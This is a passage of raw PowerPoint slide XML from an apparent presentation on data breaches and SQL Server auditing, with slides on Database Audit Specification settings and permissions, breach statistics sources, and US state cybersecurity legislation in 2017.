                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>major data breach</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1567" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semilight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47E2A6F4-AB2D-483C-A467-C081F9EF82A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270068" y="6368669"/>
            <a:ext cx="12288495" cy="400053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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980" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFB900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Sources: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="980" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFB900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://breachlevelindex.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="980" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFB900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="980" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFB900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.bloomberg.com/news/articles/2017-01-19/data-breaches-hit-record-in-2016-as-dnc-wendy-s-co-hacked</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="980" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFB900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="980" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.pewresearch.org/fact-tank/2016/09/21/the-state-of-privacy-in-america/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="980" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="980" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.pewinternet.org/2017/01/26/americans-and-cybersecurity/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="980" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="980" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semilight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39149816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44379" y="3339312"/>
            <a:ext cx="11299077" cy="640080"/>
            <a:chOff x="442072" y="9559137"/>
            <a:chExt cx="11299077" cy="1949269"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="599328" y="9559137"/>
              <a:ext cx="11141821" cy="194926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16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="442072" y="9559137"/>
              <a:ext cx="250078" cy="19492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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4949370"/>
            <a:ext cx="12192000" cy="165462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marR="0" lvl="0" indent="-342900" algn="ctr" defTabSz="932472" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buChar char="Æ"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light"/>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Database Audit Specification </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274638" y="1406525"/>
            <a:ext cx="11385550" cy="3675063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>This object collects database-level audit actions. Using more granular auditing can minimize the performance impact on your server. When you use the Database Audit Specification, you can audit at the object or user level. (The Database Audit Specification is available only in the Enterprise edition.) The following configurations are required for this object:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The Database Audit Specification name (or use the default).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The SQL Server Audit that the specification will be linked to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The Audit Action Type. Following are the options.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Audit Actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Audit Action Groups (which can be SELECTED, INSERTED, UPDATED, and DELETED)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The name of the object to be audited (when Audit Action is the Audit Action Type).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The schema of the selected object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The principal name. To audit all users, use the keyword PUBLIC in this field. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="263524" y="5050968"/>
            <a:ext cx="11660789" cy="131590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182880" tIns="91440" rIns="182880" bIns="91440" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3600" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="336145" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2400" kern="1200" spc="-20" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="560241" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="784338"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4pPr>
            <a:lvl5pPr marL="1008434" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>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3505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Currently, database-level auditing can’t be done at the column level.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Permissions required:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ALTER ANY DATABASE AUDIT SPECIFICATION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ALTER or CONTROL (permission for the database to be audited)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304277197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B8D9-A627-4761-9FCF-A0C692D1764D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Regulatory reaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17246436-97E0-4A6A-B557-520AFF35F006}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274638" y="1589724"/>
            <a:ext cx="11648855" cy="4763933"/>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20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="64000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3136" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Black" panose="020B0A02040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>US:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2745" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2353" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2017. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2353" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>At least 41 states have introduced more than 240 bills or resolutions related to cybersecurity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="224054" marR="0" lvl="1" indent="0" algn="l" defTabSz="914367"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2353" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semilight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="336145" marR="0" lvl="1"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2353" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3136" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="00188F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
